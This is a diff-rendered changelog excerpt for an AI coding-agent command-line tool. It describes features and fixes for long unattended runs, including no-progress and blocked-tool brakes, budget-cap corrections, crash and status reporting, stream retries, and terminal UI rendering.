refusal spin, and a run wedged on a permission prompt. Written temp-file-then-rename so a reader
|
|
1183
|
+
never sees a torn record, and rewritten rather than appended so it stays bounded over a week.
|
|
1184
|
+
This is the writer half of what `book status` will read.
|
|
1185
|
+
|
|
1186
|
+
- **A crash leaves a record.** There was no `uncaughtException` or `unhandledRejection` handler
|
|
1187
|
+
anywhere, and `index.ts` ends in a bare `program.parse()` whose promise nothing awaits — so when a
|
|
1188
|
+
long run died the operator got a stack trace on a stderr they may have redirected days ago, and
|
|
1189
|
+
nothing durable said why. The status file now carries a `crash` field written from the exit path,
|
|
1190
|
+
which is what distinguishes "finished the objective" from "the socket died".
|
|
1191
|
+
|
|
1192
|
+
- **Free disk space is observable.** Nothing in the codebase could see it, yet a long run's most
|
|
1193
|
+
likely hard failure is ENOSPC and a disk-below-floor alarm needs a sensor to read.
|
|
1194
|
+
|
|
1195
|
+
- **The model is told how long it has been running.** The only temporal signal in the whole prompt
|
|
1196
|
+
was a UTC calendar date at day granularity, so a model five days into a week-long objective could
|
|
1197
|
+
not distinguish that from turn 3 — it could not pace itself, notice it had been circling the same
|
|
1198
|
+
file since Tuesday, or honour a time-bounded instruction. `<session-state>` now carries a coarse
|
|
1199
|
+
`Running for:` line, suppressed when an evaluator has frozen the date so equivalent arms still get
|
|
1200
|
+
byte-identical prompts.
|
|
1201
|
+
|
|
1202
|
+
|
|
1203
|
+
- **A brake that a spinning run cannot forge (`continuation.blockedToolTurnLimit`).** A run whose
|
|
1204
|
+
every tool call is refused now stops as `all_tools_blocked`, naming the tools to unblock. This
|
|
1205
|
+
spin was invisible to everything: it never produces a tool-free turn, so the turn-end gate and
|
|
1206
|
+
every brake behind it never fire; `noteRepeatedFailure` ignores anything that is not an `error`;
|
|
1207
|
+
and `toolCallStats.failures` excludes `blocked` by construction. Headless answers every unresolved
|
|
1208
|
+
prompt `deny`, so in the default permission mode an unattended run would re-issue refused calls
|
|
1209
|
+
until the budget died. Enforced even with `continuation.enabled` false, because the spin predates
|
|
1210
|
+
continuation and needs none of it. `0` disables.
|
|
1211
|
+
|
|
1212
|
+
- **The no-progress witness no longer counts refused calls as progress.** It drew its tool-call leg
|
|
1213
|
+
from `toolCallStats`, which increments for *every* attempted call including refusals — so in a
|
|
1214
|
+
denial or policy-block stall the single leg meant to prove nothing had moved was guaranteed to
|
|
1215
|
+
move, while the todos, the file ledger, and the done-check all stayed frozen. The witness now
|
|
1216
|
+
counts only calls that actually ran. Until now this was masked by the run ending at the model's
|
|
1217
|
+
first tool-free turn; the continuation driver removes exactly that mask.
|
|
1218
|
+
|
|
1219
|
+
- **A deliberate stop is distinguishable from success.** Terminal reasons gain `plan_stop` and
|
|
1220
|
+
`handoff_requested`; both previously exited `completed / normal_completion`, byte-identical to a
|
|
1221
|
+
finished objective, and the approver's message explaining a plan stop was discarded. The status
|
|
1222
|
+
stays `completed` — neither is a failure — so only the vocabulary changes.
|
|
1223
|
+
|
|
1224
|
+
- **A restart re-drives the agents that died with it (`agents.resumeInterrupted`).** `AgentManager`
|
|
1225
|
+
already hydrated agents, plans, evidence, and snapshots on start — it just never pushed anything
|
|
1226
|
+
onto its queue, which is a bare array written only at spawn and retry. So a reboot mid-fan-out
|
|
1227
|
+
converted the entire pending backlog into `interrupted` records nothing ever picked up, silently
|
|
1228
|
+
discarding hours of child work. Recovery now records *why* an agent stopped (`resumable` plus the
|
|
1229
|
+
status it held), and the next start re-queues only those that died by process exit; a user stop
|
|
1230
|
+
stays stopped. The re-drive is contained — explorers are read-only and patchers run in their own
|
|
1231
|
+
worktree, so nothing reaches the parent workspace without the usual evidence gate.
|
|
1232
|
+
|
|
1233
|
+
- **A `Stop` hook can now refuse a premature completion.** `Stop` joins the blocking events, and
|
|
1234
|
+
under `continuation.enabled` a blocked completion becomes another turn carrying the hook's reason
|
|
1235
|
+
instead of ending the run. A hook's `block` was previously collected and discarded, which made
|
|
1236
|
+
"do not consider this finished until `npm run check` passes" inexpressible from outside the
|
|
1237
|
+
process. The gate runs once, before the objective is declared complete, and suppresses the
|
|
1238
|
+
duplicate `Stop` that would otherwise fire on the way out.
|
|
1239
|
+
- **`AgentList` and `AgentRead` now show what an agent was *for*.** `purpose` (bounded to 200
|
|
1240
|
+
characters) and `planId` join the agent summary. The root previously saw rows of
|
|
1241
|
+
`patcher-3 / interrupted / <no summary>` while both fields sat unused on disk — and after a
|
|
1242
|
+
compaction or two that row is all a parent has left of a delegated unit of work.
|
|
1243
|
+
|
|
1244
|
+
- **`book status` — what a run is doing and what it has spent, without a credential.** Reports the
|
|
1245
|
+
byte-exact original objective, message and compaction counts, cumulative tokens and an upper-bound
|
|
1246
|
+
USD figure, and the restored plan, for the newest session in a workspace or one named by id or
|
|
1247
|
+
name. `--json` for a supervisor. The objective is read from the transcript rather than a summary
|
|
1248
|
+
because the transcript is never rewritten by compaction, so the user's first words survive verbatim
|
|
1249
|
+
however many generations have passed. Credential-free by construction and asserted in
|
|
1250
|
+
`subcommands.contract.test.ts` — a run whose provider is misconfigured is exactly when someone
|
|
1251
|
+
needs to read its state.
|
|
1252
|
+
- **`Notification` hook event.** Fires when something wants a human while nobody is watching, with
|
|
1253
|
+
`severity` (`alarm`/`warn`/`info`), a machine-readable `kind`, and a message. Only `alarm` is meant
|
|
1254
|
+
to wake anyone. Wire ntfy, Slack, or SMS as an ordinary shell hook.
|
|
1255
|
+
- **Worktree admission control (`agents.maxWorktrees`, `agents.minFreeDiskBytes`).** A wide fan-out
|
|
1256
|
+
on a large repository is the one failure that takes the whole run down rather than one agent:
|
|
1257
|
+
worktrees share the filesystem with the workspace, so exhausting it breaks the root agent's own
|
|
1258
|
+
`Edit` and `Bash`. Nothing reclaimed them automatically — `AgentManager.dismiss` has exactly one
|
|
1259
|
+
caller, a TUI keypress, so print mode, the SDK, and any supervised runner reclaimed nothing ever,
|
|
1260
|
+
and the store's retention sweep runs once at startup with a 30-day default that cannot fire inside
|
|
1261
|
+
a week-long run. A spawn is now refused *before* it consumes the last of the disk, with a typed
|
|
1262
|
+
reason and an `alarm` notification. Per-worktree byte accounting is deliberately not attempted: it
|
|
1263
|
+
is an O(files) walk on every spawn and stale the moment a build writes, while free space is the
|
|
1264
|
+
quantity that matters and costs one syscall.
|
|
1265
|
+
|
|
1266
|
+
- **`continuation` — a run can outlive one user message.** `runAgentLoop` ended as soon as a turn
|
|
1267
|
+
produced no tool calls, so one user message was the whole run and a model that wrote "I've
|
|
1268
|
+
finished the auth module" exited as a normal completion with half its plan outstanding. With
|
|
1269
|
+
`continuation.enabled` the loop instead appends a host-authored user turn naming what is still
|
|
1270
|
+
open and keeps going in the same invocation, so the tool context and todo list survive and the
|
|
1271
|
+
session-state block is re-rendered fresh at every boundary. It never continues past an abort, an
|
|
1272
|
+
approved plan handoff, a spent budget, or a policy refusal.
|
|
1273
|
+
|
|
1274
|
+
Shipping with it, and not optional: a no-progress brake. Continuation without one is strictly
|
|
1275
|
+
worse than neither, because today a stalled run stops and a human notices. The brake compares a
|
|
1276
|
+
witness built from the todo list, observed-file hashes, and the tool-call count across
|
|
1277
|
+
continuation boundaries; `continuation.noProgressLimit` identical witnesses in a row ends the run
|
|
1278
|
+
as `no_progress` rather than spinning overnight against the budget. A plan whose every remaining
|
|
1279
|
+
task is blocked by unfinished work reports `blocked_plan` rather than being mistaken for success.
|
|
1280
|
+
|
|
1281
|
+
Also new: every `continuation.planRefreshTurns` turns the host restates the open plan as a user
|
|
1282
|
+
message. That keeps the plan from going stale across a long tool-grinding stretch, and it is the
|
|
1283
|
+
only *guaranteed* source of compaction bundle boundaries — a run that grinds tool calls never
|
|
1284
|
+
stops, so it never triggers a continuation either, and without it the compaction candidate span is
|
|
1285
|
+
all-assistant and the retained tail is unconditionally zero from generation 2 onward.
|
|
1286
|
+
- **`agents.checkTimeoutMs` bounds a `Check` run, and a timeout is no longer reported as a
|
|
1287
|
+
failure.** The ceiling was hardcoded at 120 s, and `exec` signals a timeout by killing the child —
|
|
1288
|
+
which arrived through the same path as a non-zero exit. On any repository whose suite runs longer
|
|
1289
|
+
than two minutes (this one builds first, so `npm test` always does), every `Check` reported a
|
|
1290
|
+
failing suite that had in fact never finished, inviting an agent to "fix" passing code. A timeout
|
|
1291
|
+
now returns a distinct, retryable `check_timed_out` that names the command and the ceiling, and
|
|
1292
|
+
the ceiling is configurable from 1 s to 2 h.
|
|
1293
|
+
- **The plan now survives a restart.** Todos were the only long-horizon state with no home
|
|
1294
|
+
anywhere: the loop seeded `ToolContext.todos` from a fresh `[]` on every invocation, TodoWrite
|
|
1295
|
+
reassigned rather than mutated, and nothing wrote them to disk. Worse, an empty task list renders
|
|
1296
|
+
as no list at all, so a dropped plan was indistinguishable from a task that never had one and the
|
|
1297
|
+
model silently re-derived instead of deliberately rebuilding. Todos now live on `SessionRuntime`
|
|
1298
|
+
beside the task graph, TodoWrite mutates that array in place, and both persist as a whole-plan
|
|
1299
|
+
`plan` session record (last record wins) that `--resume`, `--session-id`, and `fork` all restore.
|
|
1300
|
+
Older binaries ignore the record rather than breaking on it. When a session resumes with prior
|
|
1301
|
+
work and no plan, `<session-state>` says so explicitly instead of rendering nothing.
|
|
1302
|
+
|
|
1303
|
+
- **Eye-friendly built-in themes.** Added `catppuccin` (Catppuccin Mocha pastel palette for minimal eye fatigue), `nord` (Arctic glacial slate for reduced blue-light glare), `gruvbox` (warm retro-earthy dark palette with amber and olive tones), and `solarized-dark` (scientifically tuned Lab color space contrast). All four themes are selectable via `/theme` picker and direct slash commands (`/theme <name>`).
|
|
1304
|
+
|
|
1305
|
+
### Fixed
|
|
1306
|
+
|
|
1307
|
+
- **`--include-partial-messages` did nothing, and forced maximum stream volume.** Commander leaves an
|
|
1308
|
+
unpassed boolean `undefined` and the gate was `!== false`, so every stream-json run emitted every
|
|
1309
|
+
assistant and reasoning delta whether or not anyone asked. It is now the opt-in it always claimed
|
|
1310
|
+
to be.
|
|
1311
|
+
|
|
1312
|
+
- **`--max-budget-usd` is a cap again, for four independent reasons it was not.**
|
|
1313
|
+
(1) It was enforced against the root execution's *own* cost, never the inclusive
|
|
1314
|
+
figure, so every dollar spent by managed agents and subagents was invisible to it —
|
|
1315
|
+
the same snapshot would report `budgetStatus: 'exceeded'` while the pre-call check
|
|
1316
|
+
returned `{allowed: true}`. Snapshots now carry `inclusiveCostUsd` and the gate
|
|
1317
|
+
enforces against it. (2) The flag was parsed with an unvalidated `parseFloat` behind
|
|
1318
|
+
a truthiness guard, so `--max-budget-usd none` produced `NaN` — which is not
|
|
1319
|
+
`undefined`, so the budget read as *configured* while every comparison against it
|
|
1320
|
+
was false, and `0` was falsy so an explicit zero cap meant unlimited. Both flags are
|
|
1321
|
+
now validated at the boundary and the check fails closed on a non-finite ceiling.
|
|
1322
|
+
(3) Headless mints a fresh root per submitted prompt and re-seeded the full budget
|
|
1323
|
+
into each, so a hundred stream-json prompts under a $50 cap authorised $5000 in one
|
|
1324
|
+
process; spend now carries between prompts through the same seam that carries it
|
|
1325
|
+
between processes. (4) `snapshotAll` reported a budgeted run as `not_configured` as
|
|
1326
|
+
soon as a second root existed.
|
|
1327
|
+
|
|
1328
|
+
- **The budget check no longer gets slower for the life of the run.** `modelIdentities`
|
|
1329
|
+
grew one entry per provider response, per retry and per compaction — and its dedupe
|
|
1330
|
+
predicate could never match an identity with no `responseId`, so those were appended
|
|
1331
|
+
unconditionally. Both `record()` and `makeSnapshot()` then linear-scanned it per
|
|
1332
|
+
element, and `makeSnapshot` runs inside `checkBeforeModelCall` before *every* model
|
|
1333
|
+
call: quadratic work on the hot path of the spend rail, measured at 8.4 s per call by
|
|
1334
|
+
40k responses. The set is now keyed by the identity tuple its only consumer actually
|
|
1335
|
+
reads, which bounds it to the distinct model/provider/status combinations.
|
|
1336
|
+
|
|
1337
|
+
- **`--max-turns` no longer runs zero turns and reports success.** `parseInt('none', 10)`
|
|
1338
|
+
is `NaN` and `'none'` is truthy, so the typo passed the guard; every disjunct of the
|
|
1339
|
+
turn guard is false for `NaN`, so the loop body never ran and the run exited
|
|
1340
|
+
`completed / normal_completion` having made no provider call and written no output.
|
|
1341
|
+
|
|
1342
|
+
|
|
1343
|
+
- **A thinking model no longer gets cancelled mid-thought.** `retry.streamStallTimeoutMs` is 20
|
|
1344
|
+
seconds, which is right for a chat: that much silence means something broke. But adaptive thinking
|
|
1345
|
+
is on by default for every Opus and Sonnet model here, at `high` effort unless told otherwise, and
|
|
1346
|
+
a long quiet stretch before the first token is the model working. The chat ceiling was applied to
|
|
1347
|
+
it anyway, so a healthy high-effort request was cancelled and reported as `stream_stall` — the most
|
|
1348
|
+
common way an Opus run appears to "just stop". Thinking now has its own ceiling,
|
|
1349
|
+
`retry.thinkingStallTimeoutMs` (default 15 minutes, `BOOK_THINKING_STALL_TIMEOUT_MS`), applied only
|
|
1350
|
+
while thinking is enabled; the chat timeout is unchanged everywhere else.
|
|
1351
|
+
- **Claude Opus 5 is selectable and priceable.** `provider/anthropic.ts` already listed
|
|
1352
|
+
`claude-opus-5` as an adaptive-thinking model, so Book sent it thinking parameters — but it was
|
|
1353
|
+
missing from both the model picker and the pricing table. With a USD budget set, `hasKnownPricing`
|
|
1354
|
+
returned false and `checkBeforeModelCall`, which fails closed, refused **every** call: choosing
|
|
1355
|
+
Opus made the run stop before it started. It now appears in `/model` and carries the Opus family
|
|
1356
|
+
rate (re-verify against published pricing before a release).
|
|
1357
|
+
- **Undated model aliases resolve to their dated entry.** `claude-haiku-4-5` was unpriced because
|
|
1358
|
+
the table only held `claude-haiku-4-5-20251001`, and the alias is what a person types. Pricing now
|
|
1359
|
+
resolves an alias to its dated entry when exactly one candidate matches — a bare family name like
|
|
1360
|
+
`claude-opus` stays unknown rather than being guessed at a generation.
|
|
1361
|
+
- **A rejected credential parks instead of burning every retry.** 401/403 and 402 surfaced as a
|
|
1362
|
+
generic provider error, which the new transport recovery treats as re-issuable — so an invalid key
|
|
1363
|
+
was re-sent until the attempts ran out, and the run then reported a transport fault rather than the
|
|
1364
|
+
real cause. They now produce `credentials_rejected`, which is classified `park`: not retried,
|
|
1365
|
+
reported honestly, and escalated through the `Notification` hook so a supervisor can wait for a new
|
|
1366
|
+
key rather than tear the objective down.
|
|
1367
|
+
- **A USD budget no longer refuses the run it is meant to bound.** Two independent faults made
|
|
1368
|
+
`--max-budget-usd` unusable against Anthropic. No Claude entry in the pricing table declared a
|
|
1369
|
+
`cacheRead`/`cacheCreation` rate, and Book sets `cache_control` on every Anthropic request — so
|
|
1370
|
+
from the first cached turn every estimate returned `cache-pricing-unavailable`, and
|
|
1371
|
+
`checkBeforeModelCall`, which fails closed on unknown pricing, refused every subsequent call.
|
|
1372
|
+
Separately, a provider attempt that reported no usage latched the run's cost status to `unknown`
|
|
1373
|
+
and nulled the accumulated cost; since that fires from the provider's `onRetry`, one transient
|
|
1374
|
+
429 permanently disabled the budget, making the reliability layer and the only spend rail
|
|
1375
|
+
mutually exclusive. Cache rates now ship for every Claude entry, and missing attempt usage
|
|
1376
|
+
degrades to `estimated` — a lower bound the budget still enforces against — while staying visible
|
|
1377
|
+
through `completeness`, `unknownModels`, and `missingSources`. A genuinely unpriceable model still
|
|
1378
|
+
fails closed.
|
|
1379
|
+
- **Dated model ids are priced from their family.** Providers routinely resolve an alias to a dated
|
|
1380
|
+
id (`claude-sonnet-5` → `claude-sonnet-5-20260115`), which the table missed entirely; combined
|
|
1381
|
+
with the fail-closed budget gate, that turned a routine provider-side rename into a refused run.
|
|
1382
|
+
Pricing now falls back to the longest table key the id extends at a separator boundary, so
|
|
1383
|
+
`gpt-5` cannot claim `gpt-51`, and `/cost` and `/usage` resolve the same way instead of printing
|
|
1384
|
+
"pricing unknown". `estimateUsageCost` and `hasKnownPricing` also accept a per-model override map.
|
|
1385
|
+
- **A USD budget survives a restart.** `RunAccounting` was rebuilt with the process, so forty
|
|
1386
|
+
restarts meant forty independent caps. Provider usage is now written to the `usage` session record
|
|
1387
|
+
type (declared long ago with no writers) and summed back at bootstrap, so `--max-budget-usd`
|
|
1388
|
+
bounds the objective rather than one process. Only tokens are stored — pricing changes between
|
|
1389
|
+
processes — and the restored total is re-priced at the most expensive model involved, keeping it
|
|
1390
|
+
an upper bound, which is the safe direction for a ceiling.
|
|
1391
|
+
- **A dropped stream no longer ends the run.** Every stream failure mapped straight to a terminal
|
|
1392
|
+
outcome and returned, so a twenty-second provider silence, a closed socket, or a suspended laptop
|
|
1393
|
+
killed the turn — and `retry.maxAttempts` could not help, because it covers connection setup only
|
|
1394
|
+
and is out of scope once a 200 response is streaming. The loop already committed everything needed
|
|
1395
|
+
to recover and then discarded it: the partial assistant message is persisted, and every dangling
|
|
1396
|
+
`tool_use` is settled with a `cancelled` result, so the history stays valid to the provider and no
|
|
1397
|
+
tool re-executes. A transport fault now re-sends the turn onto that history, bounded by
|
|
1398
|
+
`retry.streamReissueAttempts` (default 3) with exponential backoff; set it to 0 to restore the
|
|
1399
|
+
previous behavior exactly. Which failures qualify is decided by one `terminalRecovery()`
|
|
1400
|
+
classifier — a budget, a policy block, a cancellation, or a context overflow is still a genuine
|
|
1401
|
+
end — and when the attempts are spent the original diagnosis is preserved rather than replaced.
|
|
1402
|
+
Hitting `max_tokens` now produces an `output_cap` reason instead of `protocol_error`, with its own
|
|
1403
|
+
`retry.outputCapContinuations` allowance so a large generated file cannot drain the budget a real
|
|
1404
|
+
socket drop needs.
|
|
1405
|
+
- **`Stop` and `SessionEnd` fire on every path, and say why the run stopped.** Both were skipped by
|
|
1406
|
+
each early return — a blocked prompt, a context overflow, a spent run budget, an unrecoverable
|
|
1407
|
+
stream error. That gap was defensible for a session a human is watching; it is not when a shell
|
|
1408
|
+
script is the only observer and cannot otherwise distinguish "finished the objective" from "the
|
|
1409
|
+
socket died". They now fire from a `finally`, exactly once, carrying the settled terminal status
|
|
1410
|
+
and reason.
|
|
1411
|
+
- **The spinner keeps its own hue in every built-in theme.** Five of the six themes anchor
|
|
1412
|
+
`shimmerPair` on `assistantAccent` — the agent's own colour — and ease to a lighter tint of it.
|
|
1413
|
+
Nord shipped the pair transposed, so it started on `brand`, and Catppuccin ended its breath on
|
|
1414
|
+
`brand`. Since `brand` is product chrome, and the plan block and the activity row sit on adjacent
|
|
1415
|
+
footer rows, the working line rendered in the plan header's colour: identically in Nord under
|
|
1416
|
+
reduced motion, and once per breath in Catppuccin. Both pairs now follow the convention, and a
|
|
1417
|
+
test over every built-in theme asserts `shimmerPair[0]` is `assistantAccent` and that neither end
|
|
1418
|
+
lands on `brand`, so a new theme cannot reintroduce the collision silently.
|
|
1419
|
+
- **Mouse scrolling, clicking, and copying now work together.** Full-screen mode uses SGR
|
|
1420
|
+
button-event tracking for three-row wheel scrolling, click-to-expand tool summaries, and
|
|
1421
|
+
Claude Code-style drag selection: exact character ranges highlight during a drag, copy to the
|
|
1422
|
+
system clipboard on release, and remain visibly selected until the next interaction. Shift+drag
|
|
1423
|
+
remains available for terminal-native selection. Book clears stale mouse modes before enabling
|
|
1424
|
+
its narrow tracking mode and clears them all on exit; alternate scroll (`?1007`) stays disabled
|
|
1425
|
+
during the session so a wheel nudge cannot become an input-history arrow. Every text field still
|
|
1426
|
+
strips mouse reports and re-seats its cursor, so clicks and drags can never become prompt, URL, or
|
|
1427
|
+
API-key text.
|
|
1428
|
+
- **A run that stops mid-task now says why.** Three faults compounded into a session that simply
|
|
1429
|
+
stopped after a tool result and handed the prompt back, with nothing in the transcript and nothing
|
|
1430
|
+
in the session file to say a request had failed. Reasoning is not always delivered out of band:
|
|
1431
|
+
OpenAI-compatible routers commonly inline it into `content` as `<think>…</think>`, and only the
|
|
1432
|
+
TUI renderer knew to strip those tags. The loop's empty-completion guard tested the raw string, so
|
|
1433
|
+
a turn whose entire output was an empty reasoning block measured fifteen characters, never
|
|
1434
|
+
retried, and ended the run as a normal completion — the guard was dead code against such a
|
|
1435
|
+
provider. The same guard was gated on the stream having reached its terminal event, so a router
|
|
1436
|
+
that closed the socket early skipped it too. And a provider error reached the TUI through a branch
|
|
1437
|
+
that only wrote to a debug logger that is off by default, while the loop's error path skips
|
|
1438
|
+
`onAssistantMessageComplete` — the sole writer to the session store — so neither the failure nor
|
|
1439
|
+
the half-answer that preceded it survived to explain the stop. Reasoning-tag splitting now lives
|
|
1440
|
+
in `src/reasoning-tags.ts`, shared by the loop and the renderer; the loop measures a turn's answer
|
|
1441
|
+
with the tags removed and retries once whether the stream ended cleanly or was cut short,
|
|
1442
|
+
preserving a transport diagnosis rather than replacing it with a generic one. The emptiness test
|
|
1443
|
+
reads only tags the provider actually closed, so an answer that merely opens with an unfenced
|
|
1444
|
+
`<thinking>` is not mistaken for silence. Partial output is now persisted before the loop reports
|
|
1445
|
+
the failure, and the failure itself is written into the transcript — keyed on the run's settled
|
|
1446
|
+
outcome, not on any error event, so a problem the run recovers from (a skill that fails to
|
|
1447
|
+
activate) no longer stamps a failure notice onto a turn that succeeded, and it replaces the
|
|
1448
|
+
transient banner rather than doubling it. What went wrong is visible when it happens and still
|
|
1449
|
+
there after `--resume`.
|
|
1450
|
+
- **A finished answer no longer vanishes into a collapsed thought.** The renderer reads a reasoning
|
|
1451
|
+
tag the provider never closed as reasoning running to the end of the message, which is what keeps a
|
|
1452
|
+
thought out of the answer while it streams. On a settled message that reading is a trap. An
|
|
1453
|
+
OpenAI-compatible router replays a turn's out-of-band reasoning back into history wrapped in
|
|
1454
|
+
`<reasoning_context>` tags, and a model that sees the convention starts emitting it — inconsistently
|
|
1455
|
+
closed. One such turn opened the tag, wrote a complete report, and never closed it, so the
|
|
1456
|
+
transcript filed all fourteen thousand characters as a single thought and collapsed it to one dim
|
|
1457
|
+
`thought` row: indistinguishable from an agent that quit mid-task. The loop had already learned this
|
|
1458
|
+
lesson — its emptiness test reads only tags the provider actually closed — but the renderer had no
|
|
1459
|
+
matching guard, so the two disagreed about whether the turn had answered. `splitReasoningParts` now
|
|
1460
|
+
takes `concluded`, and a turn that is complete and called no tools reads an unterminated block back
|
|
1461
|
+
as answer text, exactly as the loop already does. Both halves of that condition carry weight: a turn
|
|
1462
|
+
that called a tool has not finished speaking and was never at risk, and promoting its narration
|
|
1463
|
+
would publish a thought the reader had collapsed — past `showThinking`, since promoted text renders
|
|
1464
|
+
as markdown and no longer meets that gate. The dangling tag itself is dropped rather than shown,
|
|
1465
|
+
because `marked` renders raw markup as a fenced `html` block and would bury the recovered answer a
|
|
1466
|
+
second time.
|
|
1467
|
+
- **A stream that dies mid-tool-call no longer wedges the session.** A cut stream can carry a
|
|
1468
|
+
finished tool call the loop never got to run. `buildMessages` puts `tool_calls` on the assistant
|
|
1469
|
+
message but emits results only for calls that have one, so that dangling call made every later
|
|
1470
|
+
request malformed — Anthropic rejects a `tool_use` with no matching `tool_result` — and persisting
|
|
1471
|
+
it carried the breakage past a `--resume`. Abandoned calls are now settled with a cancelled result
|
|
1472
|
+
the way an interrupt settles them.
|
|
1473
|
+
- **A retried turn no longer shows the attempt it threw away.** Deltas reach the host as they
|
|
1474
|
+
arrive and cannot be recalled, so when the loop abandoned an attempt and retried, the abandoned
|
|
1475
|
+
reasoning sat in front of its replacement while only the replacement was persisted — the live view
|
|
1476
|
+
and a resumed view disagreed. The loop now emits `attempt_discarded` (new optional
|
|
1477
|
+
`onAttemptDiscarded` callback, and a `stream-json` event of the same name) and the TUI clears the
|
|
1478
|
+
streamed text for that turn. Holding the deltas back instead was rejected deliberately: it would
|
|
1479
|
+
render a long thinking phase as silence, which is the symptom this whole area exists to stop.
|
|
1480
|
+
- **Tool rows sit under the prose that ordered them.** A top-level tool row hung its status
|
|
1481
|
+
glyph at column 0 while prose began at column 2, so a turn read as a list of tool calls with
|
|
1482
|
+
sentences wedged between them — the prose indented from a margin the glyphs owned. Tool rows and
|
|
1483
|
+
managed-agent blocks now carry their gutter one level in, and the grid narrows by exactly what it
|
|
1484
|
+
shifts, so every row keeps its right edge and right-aligned metadata still lines up down the
|
|
1485
|
+
transcript.
|
|
1486
|
+
- **The working indicator's elapsed time rolls up into minutes and hours.** The row rendered a raw
|
|
1487
|
+
second count, so a long turn read `248s` — a figure the reader has to divide before it means
|
|
1488
|
+
anything. It now uses the same duration formatter as subagent rows, background shells and tool
|
|
1489
|
+
rows: `4m 8s`, and `1h 2m 3s` once a turn passes an hour.
|
|
1490
|
+
- **`/review` shows its work instead of going silent for minutes.** The command was dispatched
|
|
1491
|
+
fire-and-forget: it set no state, so no spinner ran; its agents were spawned with no
|
|
1492
|
+
`parentSessionId`, so the session's agent panel and status line filtered every one of them out;
|
|
1493
|
+
and the pipeline emitted its first segment only after the whole run finished. A `--deep` review
|
|
1494
|
+
was up to twenty minutes of a prompt that looked idle. The run now announces its resolved target
|
|
1495
|
+
— file count, base, path scope, and which passes are coming — before the first agent starts, and
|
|
1496
|
+
every reviewer, lens, verifier and patcher appears live in the agent panel while it works.
|
|
1497
|
+
Ownership was conflated with delivery: agents can now be owned by a session for display while
|
|
1498
|
+
suppressing the completion notification separately (`notifyParentOnCompletion`), so live progress
|
|
1499
|
+
costs no extra model turn to re-narrate a report the host already rendered. Progress goes only to
|
|
1500
|
+
a host that renders as segments arrive, so `book -p /review` stdout is unchanged — a print run has
|
|
1501
|
+
no silence to break, and the announced target is already on `data.target`.
|
|
1502
|
+
- **A review is scoped to the conversation that asked for it.** Nothing cancelled a running review
|
|
1503
|
+
when the session was replaced, so after a `/new` its report was appended to a conversation that
|
|
1504
|
+
never requested it, its agents were invisible (they belong to the old session), and it still held
|
|
1505
|
+
the single-review slot, refusing a `/review` typed in the new one.
|
|
1506
|
+
- **A local message produced mid-turn is deferred, not discarded.** `addLocalMessage` returned early
|
|
1507
|
+
whenever a send was in flight, which was correct about not clobbering a streaming turn and wrong
|
|
1508
|
+
about what to do instead. Because `/review` runs for minutes and looked idle the whole time, the
|
|
1509
|
+
natural thing to do — start another turn — silently threw away the entire review report. Blocked
|
|
1510
|
+
messages are now queued and replayed in order once the turn ends; a message owed to a
|
|
1511
|
+
conversation the user has since left is still dropped, deliberately.
|
|
1512
|
+
- **Esc cancels a running review; Ctrl+C no longer exits the app during one.** Neither key treated a
|
|
1513
|
+
review as in-flight work, so Esc was a documented no-op and Ctrl+C fell through to session exit —
|
|
1514
|
+
killing Book and orphaning the agents the review had spawned. Both now cancel the review, which
|
|
1515
|
+
stops its in-flight agents; a second Ctrl+C still exits, exactly as it does mid-stream. A
|
|
1516
|
+
cancelled review reports `inconclusive` with no findings rather than presenting the coverage
|
|
1517
|
+
failure from its own stopped agents as a result, and a cancelled `--fix` pass reports what it had
|
|
1518
|
+
already committed before stopping.
|
|
1519
|
+
- **A running tool row no longer shifts a column when it finishes.** `Spinner` already emits its
|
|
1520
|
+
own trailing space and the row added a second one, so a running row's gutter was three columns
|
|
1521
|
+
and a finished one's was two — the verb and everything after it jumped left the instant the tool
|
|
1522
|
+
completed, which is the single-column invariant the grid exists to hold.
|
|
1523
|
+
- **Our width model agreed with the renderer for `✓`.** The width table marked the whole Dingbats
|
|
1524
|
+
block as two columns wide, but it also holds the East-Asian _ambiguous_ marks — `✓`, `✗` — which
|
|
1525
|
+
terminals and Ink's own layout render one column wide. The block is now narrowed to its
|
|
1526
|
+
emoji-presentation members, and a test pins every status glyph's width against the renderer.
|
|
1527
|
+
- **The branch shows when `book` is launched from a subdirectory.** Repository detection probed for
|
|
1528
|
+
a `.git` entry, which only exists at the repository root, so the footer's new branch segment was
|
|
1529
|
+
silently absent anywhere below it. `git rev-parse` now decides.
|
|
1530
|
+
- **A malformed custom theme no longer crashes the TUI on the first spinner frame.**
|
|
1531
|
+
`.book/themes/*.json` is merged into the token set without validation, so a `shimmerPair` that is
|
|
1532
|
+
empty, short, or not an array reached the interpolator and threw.
|
|
1533
|
+
- **Context pressure survives a narrow footer.** Segment packing skips what does not fit and keeps
|
|
1534
|
+
later, shorter segments, so `ctx 5%` was dropped while the branch behind it was admitted — losing
|
|
1535
|
+
the one figure the row exists to show. The label drops before the number does.
|
|
1536
|
+
- **A reasoning tag inside a fenced code block stays in the answer.** Tag splitting ran before
|
|
1537
|
+
markdown parsing with no fence awareness, so an answer quoting a prompt template had that region
|
|
1538
|
+
torn out and rendered as a collapsed thought, silently emptying the code block.
|
|
1539
|
+
- **`Bash` rows are not painted in the dim path colour.** The directory/basename brightness ramp
|
|
1540
|
+
assumed a filesystem path, but a `Bash` target is a command: `npx vitest run src/tui/` split at
|
|
1541
|
+
the trailing slash, leaving an empty basename and rendering the row's only content at its
|
|
1542
|
+
faintest. The ramp now applies to real paths only.
|
|
1543
|
+
- **The status line and working indicator share the transcript's measure.** Both sized themselves
|
|
1544
|
+
from the raw terminal width rather than from the grid, so they could not stay in step with the
|
|
1545
|
+
rows above them when that measure changed.
|
|
1546
|
+
- **The status-line git poll no longer re-renders the app every five seconds.** `useGitStatus`
|
|
1547
|
+
allocates a fresh status object per tick and returned it unconditionally, so wiring it into the
|
|
1548
|
+
footer made the whole tree reconcile twelve times a minute in an idle session for no visual
|
|
1549
|
+
change. It now keeps the previous object when the branch, tree and error are unchanged.
|
|
1550
|
+
- **The virtual transcript estimates row heights against the measure it actually renders at.** The
|
|
1551
|
+
estimator wrapped against the raw terminal width rather than the row's own measure, so off-screen
|
|
1552
|
+
messages were estimated well short of their true height, drifting scroll position and the "older
|
|
1553
|
+
entries hidden" threshold. A user turn's rule row is counted too, and the estimate measures
|
|
1554
|
+
display width rather than code units — a line of CJK or emoji occupies twice the columns its
|
|
1555
|
+
`.length` reports, and was counted at half its real height.
|
|
1556
|
+
- **An inline-label tool row no longer clips its target early.** The width budget subtracted the
|
|
1557
|
+
verb's width from a string that already contained the verb, so a narrow-terminal row lost exactly
|
